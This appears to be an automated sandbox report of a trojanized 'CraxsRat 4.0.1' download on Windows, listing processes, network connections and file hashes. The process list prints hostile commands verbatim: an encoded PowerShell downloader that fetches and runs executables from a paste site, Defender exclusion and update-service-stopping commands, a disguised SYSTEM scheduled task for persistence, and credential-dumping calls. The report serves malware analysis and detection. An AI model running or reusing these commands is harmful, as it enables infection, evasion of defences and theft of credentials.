"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=5692 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6028 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=6368 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5408 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5304 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5356 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3348 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5784 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3272 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:8

C:\Users\Admin\Downloads\winrar-x64-622.exe

"C:\Users\Admin\Downloads\winrar-x64-622.exe"

C:\Program Files\WinRAR\uninstall.exe

"C:\Program Files\WinRAR\uninstall.exe" /setup

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\WinRAR\WinRAR.exe

"C:\Program Files\WinRAR\WinRAR.exe" x -iext -ver -imon1 -- "C:\Users\Admin\Downloads\CraxsRat_4.0.1.zip" "?\"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5148 --field-trial-handle=1832,i,4535559963667971704,8146656618097744488,131072 /prefetch:2

C:\Users\Admin\Downloads\CraxsRat_4.0.1\CraxsRat 4.0.1\CraxsRat 4.0.1.exe

"C:\Users\Admin\Downloads\CraxsRat_4.0.1\CraxsRat 4.0.1\CraxsRat 4.0.1.exe"

C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe

"C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe"

C:\Users\Admin\AppData\Local\Temp\BLACKK.exe

"C:\Users\Admin\AppData\Local\Temp\BLACKK.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAZQBnACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaQByAGsAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegB6AGsAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZAB6AHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAG4AaQBwAGsAdgAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAeAByAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBkAGUAcwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBkAGoAZQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAdgBsAHcAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeAB5AHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHEAcgBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwB3AGYAZwAjAD4A"

C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe

"C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe"

C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe

"C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe"

C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe

"C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe"

C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe

"C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"

C:\Users\Admin\AppData\Local\Temp\qrjhwnek.reg0.exe

"C:\Users\Admin\AppData\Local\Temp\qrjhwnek.reg0.exe"

C:\Users\Admin\AppData\Local\Temp\qrjhwnek.reg1.exe

"C:\Users\Admin\AppData\Local\Temp\qrjhwnek.reg1.exe"

C:\Users\Admin\AppData\Local\Temp\qrjhwnek.reg2.exe

"C:\Users\Admin\AppData\Local\Temp\qrjhwnek.reg2.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#hgkvzf#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineCPS' /tr '''C:\Program Files\Google\Chrome\updaters.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updaters.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineCPS' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

Network

Country Destination Domain Proto
US 8.8.8.8:53 123.108.74.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 233.134.159.162.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 196.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 apis.google.com udp
US 52.242.101.226:443 tcp
US 8.8.8.8:53 206.23.217.172.in-addr.arpa udp
US 13.89.179.8:443 tcp
US 8.8.8.8:53 www.win-rar.com udp
DE 51.195.68.163:443 www.win-rar.com tcp
US 8.8.8.8:53 apps.identrust.com udp
US 2.18.121.70:80 apps.identrust.com tcp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 163.68.195.51.in-addr.arpa udp
US 8.8.8.8:53 70.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 content-autofill.googleapis.com udp
GB 216.58.208.106:443 content-autofill.googleapis.com tcp
US 8.8.8.8:53 106.208.58.216.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
NL 142.251.36.14:443 play.google.com udp
US 8.8.8.8:53 194.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 14.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 8.36.251.142.in-addr.arpa udp
DE 51.195.68.163:443 www.win-rar.com tcp
NL 8.238.20.126:80 tcp
NL 173.223.113.164:443 tcp
NL 173.223.113.131:80 tcp
US 204.79.197.203:80 api.msn.com tcp
US 52.242.101.226:443 tcp
US 8.8.8.8:53 44.8.109.52.in-addr.arpa udp
NL 8.238.20.126:80 tcp
US 52.242.101.226:443 tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
US 192.178.49.163:443 beacons.gcp.gvt2.com tcp
US 8.8.8.8:53 163.49.178.192.in-addr.arpa udp
US 8.8.8.8:53 90.65.42.20.in-addr.arpa udp
US 192.178.49.163:443 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 rentry.org udp
LU 198.251.88.130:443 rentry.org tcp
US 8.8.8.8:53 bitbucket.org udp
US 104.192.141.1:443 bitbucket.org tcp
US 8.8.8.8:53 whatismyipaddress.com udp
US 104.16.155.36:80 whatismyipaddress.com tcp
US 104.16.155.36:443 whatismyipaddress.com tcp
US 8.8.8.8:53 130.88.251.198.in-addr.arpa udp
US 8.8.8.8:53 1.141.192.104.in-addr.arpa udp
US 8.8.8.8:53 36.155.16.104.in-addr.arpa udp
US 8.8.8.8:53 smtp.zoho.com udp
US 136.143.190.56:587 smtp.zoho.com tcp
US 8.8.8.8:53 56.190.143.136.in-addr.arpa udp
US 136.143.190.56:587 smtp.zoho.com tcp

Files

\??\pipe\crashpad_3592_ACDOVCADOLTQUWVP

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

MD5 99914b932bd37a50b983c5e7c90ae93b
SHA1 bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA256 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA512 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 e0ce417311579804b8f9605efbf91a73
SHA1 25172b5b4c4cbce37636492a9497d86327c18a84
SHA256 4d4583771161ce52f9444008e02308924173d43ec6810ab6bf533ae3ea2c3f26
SHA512 79c1e58d879047f6932f622ed975e54f7800fba99263ac4987e5a45f3d8798cdf1204f9d792de7a432e6e5a7cbd4db4088a490ee47fd2b041e8355415627d37f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 1c8da91907ffc5c7ee05a16c33da06af
SHA1 f60dc23d11b05be4ee4696e142e410dd902970ac
SHA256 a76f8e5714dc97c5b2c16142f6f6da212d86e1a910d75cf6385d70d4c516a319
SHA512 50f1933abeb0df18a4b5b26c0b314ff0274054cce6fc800cec50f97e62e0a0ab467b12d3a895bb103068d3139ff6543c5d6fa98dcebbcd98711de9f8a8239c52

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 f1b37f254f92009f2aaaf9dfde60db1a
SHA1 834be803b63d7c431e2030ae1d8967ef2c9c2f9a
SHA256 fba4a3e94bc868623e9f27b324414c13f2cbe9d69030bc2082e0f0524194db3d
SHA512 cbe74ad7e5ed3d21c217509e9bc6656d4fee8c15d2a924eb9263e85a71c7e742ddd5ee612fdb819d9e93af2ca52c51598676ca3b7166f7c307cfdbbb542c0f72

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 e1e0505ed461d4e1c1f8ba79ad215381
SHA1 5acacf88a06a9c853f29e966dcc122aa591c100c
SHA256 5f65a0ebf8a853b12cb2ff65901b78269cb95fdbdc3f52d05365e30af64306c7
SHA512 b9c51992a21200b296c2e6c43cda153ecd8de61c41675c8e1f653da0e8e2df16ef4c2a5d976725bec24fad8bd29bfffcd9d757947fe6c4bd155803e7363ef3fa

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 eeaface4d0adb3f46276381fea765c7d
SHA1 7fac5742b2569721b5ed5fcd196cb01ba73f4df4
SHA256 e5aea05406ee1cb6e5aa4c5cd670cd0e7e53dfb9c740e5175d21682aac89c740
SHA512 a7154d7dac25267479517aa2e7b21f77eade7d7969141ff1c0b331c9363c8f33d8347777c7947cebdb376144e9aa70193d2b6414339c24956ca67a4e92dc4fbf

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 1b1e4b1759b0cdc07439e0ee6f119db3
SHA1 ca588f35c50860ddfc0df0f54f93f73ce572e487
SHA256 b8dac8e477f7bd64e7b804ad16af1a547f24fb163359165d95e1258d126e9fc1
SHA512 d5a29c6470d4d772155fb86e9c1b56903d3d9548ac09c70054e464c5b84b6e48ec307e0417ed31bb1dbb52f239b751f33f196e66a754c80adcdd52a7117feb6c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

MD5 d0fe95c10254c82c0edc553671d056c2
SHA1 d37ccd4a2b5df4690cf07af82d61713c180c68a1
SHA256 e497b1ab7680172eb212189f739980a20b9684beb0d60b3e088f5206cd534100
SHA512 a53ac0bc27258b8e967423417480be3a893d19483fd8437be27e367a8b4f1210c086a6f3f61b2a2223328e7573d6f8e90cdd3aca4dc2fe24bbd68c36ca75e7f2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe57540b.TMP

MD5 0c66da520936840091a9553b9544643f
SHA1 a7e675f2a479810ed60cdab49913eeff588468be
SHA256 bb916a27defc62f40754a29cfeb59c9073ac4f3b6e839b2ba71d80625d68b3f9
SHA512 1856085144009761efa5f2906c73e91a81cd9797dfefcd5ea90510b0265fb3796dd08acd430c3df49a98b88f8be5f07eed8aa011a68ad0a4ba25181ce6542f58

C:\Users\Admin\Downloads\Unconfirmed 494050.crdownload

MD5 8a3faa499854ea7ff1a7ea5dbfdfccfb
SHA1 e0c4e5f7e08207319637c963c439e60735939dec
SHA256 e5e9f54a55ad4b936adaed4cca5b4d29bd6f308f1a0136a7e3c0f5fb234e7fff
SHA512 4c7474353dd64e1a1568b93e17be3f2f0eaf24b7d520339c033f46a517b0e048e88bda1b5d5bcfe62353930d8d76a7037ec6200882df8afc310322a5d5fceb25

C:\Users\Admin\Downloads\winrar-x64-622.exe

MD5 8a3faa499854ea7ff1a7ea5dbfdfccfb
SHA1 e0c4e5f7e08207319637c963c439e60735939dec
SHA256 e5e9f54a55ad4b936adaed4cca5b4d29bd6f308f1a0136a7e3c0f5fb234e7fff
SHA512 4c7474353dd64e1a1568b93e17be3f2f0eaf24b7d520339c033f46a517b0e048e88bda1b5d5bcfe62353930d8d76a7037ec6200882df8afc310322a5d5fceb25

C:\Users\Admin\Downloads\winrar-x64-622.exe

MD5 8a3faa499854ea7ff1a7ea5dbfdfccfb
SHA1 e0c4e5f7e08207319637c963c439e60735939dec
SHA256 e5e9f54a55ad4b936adaed4cca5b4d29bd6f308f1a0136a7e3c0f5fb234e7fff
SHA512 4c7474353dd64e1a1568b93e17be3f2f0eaf24b7d520339c033f46a517b0e048e88bda1b5d5bcfe62353930d8d76a7037ec6200882df8afc310322a5d5fceb25

C:\Program Files\WinRAR\Uninstall.exe

MD5 36297a3a577f3dcc095c11e5d76ede24
SHA1 ace587f83fb852d3cc9509386d7682f11235b797
SHA256 f7070f4bb071cd497bf3067291657a9a23aab1ca9d0ab3f94721ef13139ce11b
SHA512 f7a3937f9ffb5ebaac95bddc4163436decdd6512f33675e3709227a1a7762588a071143140ed6bb2a143b006931e5c8b49486647800f0de2e5c355e480f57631

C:\Program Files\WinRAR\Uninstall.exe

MD5 36297a3a577f3dcc095c11e5d76ede24
SHA1 ace587f83fb852d3cc9509386d7682f11235b797
SHA256 f7070f4bb071cd497bf3067291657a9a23aab1ca9d0ab3f94721ef13139ce11b
SHA512 f7a3937f9ffb5ebaac95bddc4163436decdd6512f33675e3709227a1a7762588a071143140ed6bb2a143b006931e5c8b49486647800f0de2e5c355e480f57631

C:\Program Files\WinRAR\uninstall.exe

MD5 36297a3a577f3dcc095c11e5d76ede24
SHA1 ace587f83fb852d3cc9509386d7682f11235b797
SHA256 f7070f4bb071cd497bf3067291657a9a23aab1ca9d0ab3f94721ef13139ce11b
SHA512 f7a3937f9ffb5ebaac95bddc4163436decdd6512f33675e3709227a1a7762588a071143140ed6bb2a143b006931e5c8b49486647800f0de2e5c355e480f57631

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 7b500a0deb3ac0828009bfa9163e4ba1
SHA1 db68d78d2c26f1bb73e9cbf8a1f943cd71451977
SHA256 0458e10bb888f754970fd6da3fe11ad1dcf8f597c62bf9774a71d8cd60b372a2
SHA512 7cc56f7b1313b88d2befdf0ce6e194cd0804d9432b00b90d0380e05fbad6689cd6507a77d97babaec7f9fd5600bc9f648a6cc9c1910f6297e50cebeaa9766627

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 aa7f7359bf5f64b4053726c789d5494a
SHA1 d737378fc1553837d1d9883666f9fb3fbdc535d0
SHA256 deeb6a87b010ccd855fafde546c5341efc3bd3bdc3fa9596fafbbed7f76f2c1f
SHA512 92f9b442cc1227c67c0b74a76a174c3df2996efc76c014a92c3c8ab87958759f9ff6f9d9fa346c206fb26c3cbc7cce5f203aef636b9d08108aee51ce5b689af0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 70f6a3d89f8a4c920664e6f0993d8711
SHA1 2acf5a79177bc54c767a5e842e4e5026a853b0a5
SHA256 47a1ed49f9699211f60d042788a68d7e695dc5e9557125de887bbf577b0f6620
SHA512 06db6d8171734144a491da5da986cedd6b2bfc99fabc17ba031fae0d6a7f6b584f7ddbb90fd9a533c98d5c897ac4c16bef960ad8b1a60c3b0f7b9737dba12c85

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

MD5 b518a4713e4ff98c9d23513633806d7d
SHA1 e9c87ad06551ba5f113dc0b5894898cb2a09ed77
SHA256 795983c42333e052f8f96e10af965ee581b25d2706e92879e793c79b48ba71ec
SHA512 e8e51b94453804c5897266403c8d293e37a08937bbf9e13c740d39ec942f76cacb99d82ed25e896f618156ce763316b3070a4917b22a992e77249443482a415f

C:\Program Files\WinRAR\WinRAR.exe

MD5 04fbad3541e29251a425003b772726e1
SHA1 f6916b7b7a42d1de8ef5fa16e16409e6d55ace97
SHA256 0244b889e1928a51b8552ab394f28b6419c00542a1bbc2366e661526790ec0a7
SHA512 3e85cf46dd5a7cadc300488e6dadea7f271404fb571e46f07698b3e4eaac6225f52823371d33d41b6bbd7e6668cd60f29a13e6c94b9e9cb7e66090af6383d8b2

C:\Program Files\WinRAR\Rar.txt

MD5 18eeb70635ccbe518da5598ff203db53
SHA1 f0be58b64f84eac86b5e05685e55ebaef380b538
SHA256 27b85e1a4ff7df5235d05b41f9d60d054516b16779803d8649a86a1e815b105b
SHA512 0b2a295b069722d75a15369b15bb88f13fbda56269d2db92c612b19578fc8dadf4f142ebb7ee94a83f87b2ddd6b715972df88b6bb0281853d40b1ce61957d3bd

C:\Program Files\WinRAR\WinRAR.chm

MD5 11d4425b6fc8eb1a37066220cac1887a
SHA1 7d1ee2a5594073f906d49b61431267d29d41300e
SHA256 326d091a39ced3317d9665ed647686462203b42f23b787a3ed4b4ad3e028cc1e
SHA512 236f7b514560d01656ffdee317d39e58a29f260acfd62f6b6659e7e2f2fca2ac8e6becac5067bab5a6ceaeaece6f942633548baeae26655d04ac3143a752be98

C:\Program Files\WinRAR\WhatsNew.txt

MD5 eaeee5f6ee0a3f0fe6f471a75aca13b8
SHA1 58cd77ef76371e349e4bf9891d98120074bd850c
SHA256 f723976575d08f1001b564532b0a849888135059e7c9343c453eead387d7ae4c
SHA512 3fc5994eefce000722679cf03b3e8f6d4a5e5ebfd9d0cc8f362e98b929d1c71e35313a183bfe3ab5adbd9ce52188ade167b8695a58ebd6476189b41627512604

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 1c606acbee97ce6eba267c191a2b39fb
SHA1 085d3a6e3fd0e09e23e48db64e17527872c84c25
SHA256 94dc4c918af6432468d34683f7227b334a6dff3913b75140a9a8c856efe7a588
SHA512 afea44d9ff01dd4c6a641d9bc09230fa56027dcb22c89817c99514f663b041e4a11d20a3bb89a9ee34d50f3f5f2a264dcd775235d345a1eb22e4bb9e673648cf

C:\Program Files\WinRAR\RarExt.dll

MD5 608f972a89e2d43b4c55e4e72483cfd5
SHA1 1b58762a3ae9ba9647d879819d1364e787cb3730
SHA256 dd989631b1b4f5450766ad42aec9a0e16718a0d23bc694fa238a4d54b02be417
SHA512 3c410d19aaa780e4fe25b331f85bdd8ccd0a9f585d538afdf216dfcd5c3a6ee911924bcca9078af689c4610f23a31e5a89c7c84144356e8dedceac7fb020960a

C:\Program Files\WinRAR\WinRAR.exe

MD5 04fbad3541e29251a425003b772726e1
SHA1 f6916b7b7a42d1de8ef5fa16e16409e6d55ace97
SHA256 0244b889e1928a51b8552ab394f28b6419c00542a1bbc2366e661526790ec0a7
SHA512 3e85cf46dd5a7cadc300488e6dadea7f271404fb571e46f07698b3e4eaac6225f52823371d33d41b6bbd7e6668cd60f29a13e6c94b9e9cb7e66090af6383d8b2

C:\Users\Admin\Downloads\CraxsRat_4.0.1.zip

MD5 8a50e7c45a5e3f997cc5977877905cd4
SHA1 69322ab4e93846603acdf50d778721766ec76515
SHA256 330be9927418eca24b6b0acadec70a2ebcdccfd9b3a7588ef4e707bf85c76502
SHA512 360f6b1aac4648a45b653fb7bd1a91007093ae535e855c043b301240e47cf19f4d78442f080b869a52c62bc3386068afb77b42b8a98349eab780eb39b45d6b14

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 f283eba8092b16cfbcfaa20e536d7ea0
SHA1 a7945d8de0bc5628a8f498365150959c24521d56
SHA256 cd4b21656681db95778cbe8e144d75ebecde08b471eae09d5841ad10937329b8
SHA512 9334a1c674b22153de7d12dcfaebbfa08a5fee55b3bddb54feed4b9d672ea24e6a06604fac148cabc39ffa7fdb81c21fc50b87072b872c9693fdd69a03d51238

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 6c5d0785d213b5c91fcffe10c171a5a0
SHA1 bcc22eeb8b2bf7346c6179b7c5f015bd094d4ef8
SHA256 0737f39034bd7e8c4f3a03e3286a67f3885e5a10556d4bff3ddaffe07e54ed2d
SHA512 b234cf42401cd849a1df5de55ce9eeacfc745e8ed8df45939962620ec3e91d6034e424ef1c81321149d9757d052333b0e184c95a6ca5c610aaff9baaf2453ac9

C:\Users\Admin\Downloads\CraxsRat_4.0.1\CraxsRat 4.0.1\CraxsRat 4.0.1.exe

MD5 81c22352dd68afc80e3da83547b65ca9
SHA1 815d2402b2a723b56f82690ed5af01717fcad751
SHA256 4cf6e11851bf2ee98c45d826134413a674e7b5740ca95c38450db77750fdb8a8
SHA512 e3c3c2ea2282c0f0d31f6a889b36651e9e522b0c1d8730f4149a765e053a2e8e6761068581358062db17289ad1245d6db397816e7afe63b934152e79dac76ecc

C:\Users\Admin\Downloads\CraxsRat_4.0.1\CraxsRat 4.0.1\CraxsRat 4.0.1.exe

MD5 81c22352dd68afc80e3da83547b65ca9
SHA1 815d2402b2a723b56f82690ed5af01717fcad751
SHA256 4cf6e11851bf2ee98c45d826134413a674e7b5740ca95c38450db77750fdb8a8
SHA512 e3c3c2ea2282c0f0d31f6a889b36651e9e522b0c1d8730f4149a765e053a2e8e6761068581358062db17289ad1245d6db397816e7afe63b934152e79dac76ecc

C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe

MD5 f873bee92e6118ff16b63b2a75173818
SHA1 4061cab004813a12e8042b83228885dfbc88547f
